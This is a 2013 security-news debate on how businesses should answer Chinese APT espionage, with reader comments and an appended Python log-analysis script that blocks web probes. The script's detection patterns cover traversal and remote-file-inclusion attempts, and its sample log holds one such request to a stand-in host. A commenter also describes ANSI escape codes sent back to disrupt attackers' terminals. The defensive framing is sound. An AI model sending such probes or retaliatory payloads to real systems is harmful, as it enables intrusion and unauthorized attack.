Attacks/Breaches
3/11/2013
03:07 PM

China Hack Attacks: Play Offense Or Defense?

The Chinese government has been blamed for launching cyber-espionage APT attacks against U.S. businesses. In this debate, two security experts examine how business should respond.

How should U.S. businesses respond to allegations that the Chinese government has been waging cyber espionage using advanced persistent threat (APT) attacks since at least 2006?

Security firm Mandiant recently threw down the gauntlet about these types of attacks, tracing exploits of 141 businesses -- across 20 industries -- to a single group based in China, which it dubbed "APT1."

The existence of such groups isn't in dispute. Indeed, China-based APT gangs appear to have been operating for at least the past six years. Such groups often use spear-phishing emails and attractive-looking but malicious attachments to compromise targeted systems and install a remote-access Trojan (RAT). Attackers then gain a back door onto the targeted network, giving them a jumping-off point for further attacks and reconnaissance, including against a company's business partners.

What is in dispute, however, is how businesses should respond. One school of thought is that they should take a more offensive posture, and gather actionable intelligence for government agencies to carry forward.

Another camp, however, argues that businesses' time and energy would be better spent shoring up defenses and patching known vulnerabilities, to minimize the fallout of the next, inevitable data breach.

In our debate, Shawn Henry, president of CrowdStrike Services, calls for identifying your adversaries and providing this information to law enforcement agencies. John Pescatore, director of emerging security trends at the SANS Institute, says the attacks should drive businesses to focus on their defenses.

What's your view? Use the commenting tool below the article to challenge these experts and share your opinion.

Play Offense

Shawn Henry
President, CrowdStrike Services

We have spoken of the cyber threat for far too long. Foreign adversaries have targeted every major organization in this country, and have stolen untold billions of dollars of intellectual property, research and development and corporate strategies and secrets. The volume and sophistication of cyber espionage has increased dramatically during the past five years, and it will grow, unabated, because the financial reward is incalculably high and the risk of negative consequences is almost non-existent.

Our mistake is that we are using the same approach against targeted attack actors, who actually have specific targets in mind and are not going to stop until they have reached their goal. They are relentless. It's not enough to stop their attacks once or twice; they will keep trying until they get in. The problem with existing technologies and defensive tactics is they are too focused on adversary tools (malware and exploits) and not on who the adversary is and how they operate.

This requires us to stop relying solely on "defense." The current cybersecurity approach is "vulnerability reduction," and it has largely failed for the past 20 years. We focus on hardening our networks by "defense-in-depth," using firewalls, anti-virus software, patching vulnerabilities and employing intrusion prevention systems. This approach generally stops those opportunistic actors willing to rob "any data," but the sophisticated, targeted adversary practices crafty offense, and the offense outpaces the defense. While we certainly need to continue with robust defense, we cannot let our guard down. We need to be more proactive and strategic in our approach to the adversary.

Employing a threat mitigation strategy requires an increased ability to detect and identify our adversaries, and to penalize them. This is the identical strategy we employ in the physical world every single day to thwart criminals, spies, and terrorists. They don't refrain from stealing and killing because we're too secure -- hardly! We walk down the street every day, play in parks, shop in malls and live in houses with glass windows. We're safer, physically, because law enforcement, the intelligence community and the Department of Defense constantly identify, mitigate, disrupt, arrest and deter the adversary.

In the cyber environment, we must assume adversaries are already inside the perimeter, and we must constantly hunt them on our networks to identify and mitigate their actions. We cannot stand by and wait for them to trip an alarm as they shake the proverbial fence, because sophisticated adversaries jump over the fence, bypassing the intrusion detection "alarm" entirely. Hunting necessitates us acquiring a better sight picture of the adversaries: what assets are they targeting, what techniques are they employing, why are they here and who, exactly, are they? This is where intelligence sharing is critical. Companies can use advanced analytical technology to share actionable intelligence, enabling them to correlate data, learn the human aspects of the attack, become more predictive and identify them early enough in the attack cycle to prevent serious consequences.

By no means do I advocate vigilantism, or "hacking back." While I think companies can employ certain "active defense" strategies on their networks to make things much more difficult for the adversary, such as denial and deception campaigns designed to fool them, the primary mitigation role rests with the federal government.

Success in the cyber environment will require unprecedented coordination between private industry -- which as a whole has the ownership and ability to achieve these goals -- and governments, which are primarily authorized to investigate and penalize.

Inevitably we must bring the private sector and the government together to achieve the goal of threat deterrence. The vast majority of the intelligence that will lead to identification of the adversaries resides on private sector networks; they are, in essence, "crime scenes," and the evidence and artifacts of the breach are resident on those networks. That threat intelligence, too, can't be shared periodically via e-mail at human-speed; it needs to be shared among all victims, in real-time, at network speed. The private sector, then, can fill tactical gaps to which the government is blind. This can be done while respecting privacy, a critical and absolutely necessary element of intelligence sharing.

When the adversary is identified, the government can use its resources and actions -- law enforcement, civil, diplomatic, financial, or otherwise -- to mitigate the threat posed by these sophisticated opponents. The consistent threat posed by adversaries will subside only when the cost to operate outweighs any potential gain.

We face significant challenges in our efforts to combat the cyber threat. We must start by opening the debate on the limitations of the existing defensive-only security model and the necessity for a threat deterrence model.

I am optimistic that by strengthening partnerships, effectively sharing actionable intelligence, and successfully identifying our adversaries, with continued defensive measures, we can best protect commercial and critical infrastructure from grave damage. By jointly working together to achieve a safer cyber environment, we can shine a light on our adversaries and stop them in their tracks, instead of constantly telling victims to "just do more."

Shawn Henry is the president of CrowdStrike Services, a security technology firm focused on helping enterprises protect their most sensitive information. He retired from the FBI in 2012 as Executive Assistant Director, where he had responsibility for, among other things, FBI cyber strategy and operations worldwide.

Play Defense

John Pescatore
Director, Emerging Security Trends, SANS

Consider this common scenario: your CFO clicks on a phishing email. Her PC, lacking numerous patches, gets compromised and the attacker takes advantage of the CFO's over-privileged account to log into the engineering database and steal the crown jewels of your corporate intellectual property. Six weeks later, when the compromise is finally discovered, your CEO is stomping towards you, and the InfoSec magical genie appears before you and says: "I have a way back machine and will send you back in time to the day before the compromise. You can have one new piece of knowledge to prevent the attack. What do you choose?"

Whether the attack came from a PLA commander in Beijing, a hacktivist in Helsinki or a clever teenager in Toledo shouldn't even make the top 5 things you would wish to know beforehand -- it is the attack and the vulnerabilities exploited that matter, not who launched the attack.

You see, there is a major difference between physical attacks and cyber attacks. In physical attacks, size matters. No bank can protect itself against a tank or a jet aircraft. However, that is not the case in the cyber world. That scenario above has been launched for years by cybercriminals, hacktivists and vandals -- and in recent years received a lot of press because governments are now doing so, as well. Every one of those attacks exploits the same vulnerabilities or deficiencies in critical security controls. Fix those and it doesn't matter who launched the attack. The attack is prevented, avoided or mitigated.

Have you noticed that in this wave of press about advanced targeted attacks some companies have admitted having their entire business compromised, while others have said the first stage got in but the attack failed, and still others have not had to say anything? The companies that pay attention to the blocking and tackling of minimizing vulnerabilities, shielding the unavoidable and leaning forward to detect unusual events not only stay more secure, but also usually end up spending a smaller percentage of revenue to achieve a higher level of security -- without needing to know who actually launched those attacks.

There is also a major difference between what business can and should do about attacks, and what law enforcement and governments should do. Banks don't chase bank robbers. Police departments don't prevent retail shrinkage (shoplifting and employee theft). Defense contractors don't create phony factories to keep industrial spies busy. Fighting back against attackers may sound good but it never, ever makes good business sense.

The best business strategy is the security program that avoids vulnerabilities and risks wherever possible, and minimizes the damage of the inevitable successful attack. Entering into active defense-fueled mutually assured destruction scenarios may have merits at the national defense level but never makes sense at the business level.

Look, it isn't glamorous but the best information security programs are just like the best offensive lines in football. They are the most successful when no one hears about them at all. To keep the quarterback from being sacked, they don't need to know the names of the blitzing linebackers -- they need to know what tactics the attackers use, they need to plug the gaps and they need to jump on the ball when the "skill positions" fumble.

Governments should focus on national security issues, law enforcement on chasing and punishing criminals, and businesses on protecting their customers' data and their stakeholders' interests. Mixing those up inevitably ends up with the quarterback sacked and the other team running away with the game.

John Pescatore joined SANS in January 2013 after more than 13 years as Gartner's lead security analyst. Prior to Gartner he ran consulting groups at Trusted Information Systems and Entrust in the firewall and PKI areas and spent 11 years building secure systems for GTE. He began his career at the National Security Agency followed by the U.S. Secret Service.

Comments
Mark Sitkowski
User Rank: Apprentice
3/14/2013 | 11:51:51 PM
re: China Hack Attacks: Play Offense Or Defense?
In theory, such enforcement is provided by the CERT organisations in each country. In practice, the cooperation you get from them varies enormously.
I know precisely where the C&C for this botnet is, hiding behind 200 dynamically allocated IP addresses in Turkey, but I can't get any cooperation from the Turkish Telecom company, or a reply from the CERT office.
Even if there were a private cyber hit team, they couldn't trace dynamic IP addresses from the outside, so there is no offensive action that can be taken.
Jonathan_Camhi
User Rank: Apprentice
3/14/2013 | 8:20:44 PM
re: China Hack Attacks: Play Offense Or Defense?
I'm not sure if it should be left up to each business to decide on its own how to deal with the situation. Any cyber security legislation coming from Washington should seek to address when and how companies should counter attacks from hackers, and if any offense should be left to the national security experts. It would be helpful to have some clearly defined roles to get everyone on the same page working against the current threats that are out there.
Tonyvo
User Rank: Apprentice
3/14/2013 | 4:42:57 PM
re: China Hack Attacks: Play Offense Or Defense?
Espionage is an older human profession and pastime than prostitution. In fact, the Garden of Eden story is about a God spying on Adam and Eve as they tried to hack the Tree of Knowledge!
And so, the distinction between offense and defense in this "game of life" is as relative and moot as the illusory distinction between good and evil itself. It all depends on viewpoint of the side you are presently playing for.
The simple premise is that if you have something worth protecting, you will have to protect it. And if you hire a CFO or a Guardian Angel that is stupid enough to follow a phishing link in an email, then you probably aren't very good at protection and you deserve to get hacked.
Sacalpha1
User Rank: Apprentice
3/14/2013 | 4:38:51 AM
re: China Hack Attacks: Play Offense Or Defense?
I don't think it's one or the other. It's both at the same time. You should absolutely have the latest patches, virus definitions, firewall defenses, etc. in place. That is a fundamental part of IT's job in any company. But there needs to be a much better offensive component as well. If there is no penalty for the attacker other than they just didn't get any data (because of good defenses), there is no deterrent for future attempts. We need specialized law enforcement groups that actively counter hack threats. I also like the idea in another comment of licensed privateers that are hired to go after specific targets.
Destroying Angel
User Rank: Apprentice
3/13/2013 | 6:45:59 PM
re: China Hack Attacks: Play Offense Or Defense?
Shawn Henry is PART of the way there. The rest of the way involves congressionally bonded and licensed cyber privateers. The deterrence factor would cover not only cyberthieves but rogue governments as well. You want absolute proof that deterrence works? Notice how those zany pranksters at Anonymous backed down from attacking drug cartels. Maybe something about seeing body parts (theirs, their families', and their friends') scattered in public places made them reconsider.
philburton
User Rank: Apprentice
3/13/2013 | 6:37:50 PM
re: China Hack Attacks: Play Offense Or Defense?
Why not direct these comments to the Republicans and the Chamber of Commerce, who opposed a bill in Congress that would have promoted a government/private sector partnership in this area?
beachman14
User Rank: Apprentice
3/13/2013 | 12:46:22 PM
re: China Hack Attacks: Play Offense Or Defense?
Stealing is stealing, stolen assets should be retrieved, and thieves should be punished. If you have valuable physical assets to protect, you place them in a secure location and lock the doors. And if a thief breaks in and steals them, you catch the thief, retrieve the stolen assets, and administer justice. How is this so different? Of course you have to have good defense, but the thieves have broken in and stolen valuable assets. How about we retrieve the value of that which was stolen by our government not repaying loans from the offenders? How about we administer justice by having ICANN remove the offenders' connectivity from the Internet altogether for some period of time? The thieves have been identified, so let's recover the value of what was stolen and punish the thieves.
Andrew Hornback
User Rank: Apprentice
3/13/2013 | 4:06:10 AM
re: China Hack Attacks: Play Offense Or Defense?
As much as I'd like to say that I agree with playing offense here, you can't play offense until you've got a strong defense. It's an absolute must to keep everything as current as possible - OS patches, application patches, security appliance firmware, and user knowledge.

All of the latest and greatest security technology in the world can be defeated if the "man in the loop" fails to act in a secure manner. As long as users are involved, there is a risk of failure, period.

If you assume that the enemy is within your perimeter already, do you block ingress or egress? How do you determine if the enemy is there - given sufficient time and sophisticated attacks, can you depend on any system you have detecting that they're there? At that point, do you shut everything down and do a full security sweep? Hardly - business has to keep running, especially when a global economy dictates it.

From the play offense point of view, your INFOSEC folks are always going to be seen as playing catch-up and while that may be true in some instances... I think that from a management point of view, you're adding more stress to a group that's usually quite well enough stressed as it is.

Andrew Hornback
InformationWeek Contributor
Drew Conry-Murray
User Rank: Ninja
3/13/2013 | 12:02:55 AM
re: China Hack Attacks: Play Offense Or Defense?
I agree with Shawn Henry that the private sector can do more to share actionable security information within appropriate verticals, but it also seems like both sides are arguing, correctly, that businesses should focus on creating a robust set of defenses, and let law enforcement and government agencies handle prosecution or retaliation.

Drew Conry-Murray
Editor, Network Computing
Mark Sitkowski
User Rank: Apprentice
3/12/2013 | 11:16:47 PM
re: China Hack Attacks: Play Offense Or Defense?
Unlike other readers, I can speak with a bit more insight, since we've been under a cyber attack since last December.
I agree with John, in that your system should be as near hack-proof as you can make it. To date, not a single attack vector has succeeded, so we must have done something right.
We minimise the impact on ourselves by getting our IDS to immediately generate a new firewall rule for every identified hack attempt. It also generates an email to the ISP, identifying the IP address of the attacking zombie and a clue as to where to find the malware (eggdrop bot/psybnc).
Our offence strategy, if you can call it that, is in the form of an abuse file, sent back by Apache, containing 1500 lines of 'Attempted Abuse' messages which, at least, delay the next line of the hack script long enough for the firewall to be in a position to stop it. For good measure, the last line of the abuse file is a series of ANSI escape codes, designed to screw up any ANSI terminal running a script.
Having had little joy from communicating with CERT, in the 51 countries from which attacks are emanating, we recently contacted SANS and, at least, get the impression that they know what they're doing.
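The auto-blocking and ISP-reporting loop this commenter describes, as an added illustration that is not the commenter's own code: a detector reads Apache access-log lines, counts probe requests per source address, and once a source crosses a threshold emits a firewall DROP rule plus the summary one would paste into an abuse report. The log lines, the probe path patterns, the threshold and the iptables rule shape are all constructed assumptions for this example.

```python
"""Auto-block web probes: parse Apache access-log lines, count probe requests
per source address, and emit a firewall DROP rule plus an abuse-report summary
once a source crosses a threshold. Added example; all data here is constructed."""
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed, deliberately small list of request shapes a visitor to this
# (hypothetical) static site would never send; tune it for your own site.
PROBE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"/setup\.php$",          # installers for admin tools the site lacks
    r"^/cgi-bin/",            # no CGI deployed here
    r"(\.\./|%2e%2e%2f)",     # directory traversal
    r"=(https?|ftp)://",      # remote-file-inclusion style parameters
)]

def parse_line(line):
    """Return ip/ts/method/path/status (all strings) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.groupdict()

def is_probe(entry):
    # Flag on the path alone: a 200 on one of these paths is worse news, not better.
    return any(p.search(entry["path"]) for p in PROBE_PATTERNS)

def analyse(log_text, threshold=3):
    """Group probes by source. Sources at or above `threshold` get a DROP rule;
    every probing source gets a summary suitable for an abuse report to its ISP."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_probe(entry):
            probes[entry["ip"]].append(entry)
    rules, reports = [], {}
    for ip, hits in sorted(probes.items()):
        reports[ip] = {
            "count": len(hits),
            "first_seen": hits[0]["ts"],
            "last_seen": hits[-1]["ts"],
            "paths": sorted({h["path"] for h in hits}),
        }
        if len(hits) >= threshold:
            # -I puts the rule at the top of INPUT, ahead of any ACCEPT rules.
            rules.append(f"iptables -I INPUT -s {ip} -j DROP")
    return {"rules": rules, "reports": reports}

# Constructed sample traffic (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2013:22:14:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:22:14:03 +0000] "GET /phpMyAdmin/setup.php HTTP/1.1" 404 210 "-" "-"
198.51.100.7 - - [12/Mar/2013:22:14:04 +0000] "GET /pma/setup.php HTTP/1.1" 404 210 "-" "-"
198.51.100.7 - - [12/Mar/2013:22:14:05 +0000] "GET /cgi-bin/php HTTP/1.1" 404 210 "-" "-"
192.0.2.9 - - [12/Mar/2013:22:14:07 +0000] "GET /index.php?page=http://evil.example/x.txt HTTP/1.1" 404 0 "-" "-"
"""

if __name__ == "__main__":
    print("\n".join(analyse(SAMPLE_LOG)["rules"]))  # one DROP rule, for 198.51.100.7
```

The single-probe source 192.0.2.9 appears only in the report summary, not in the rules, which is the point of the threshold: report everything, block only what repeats.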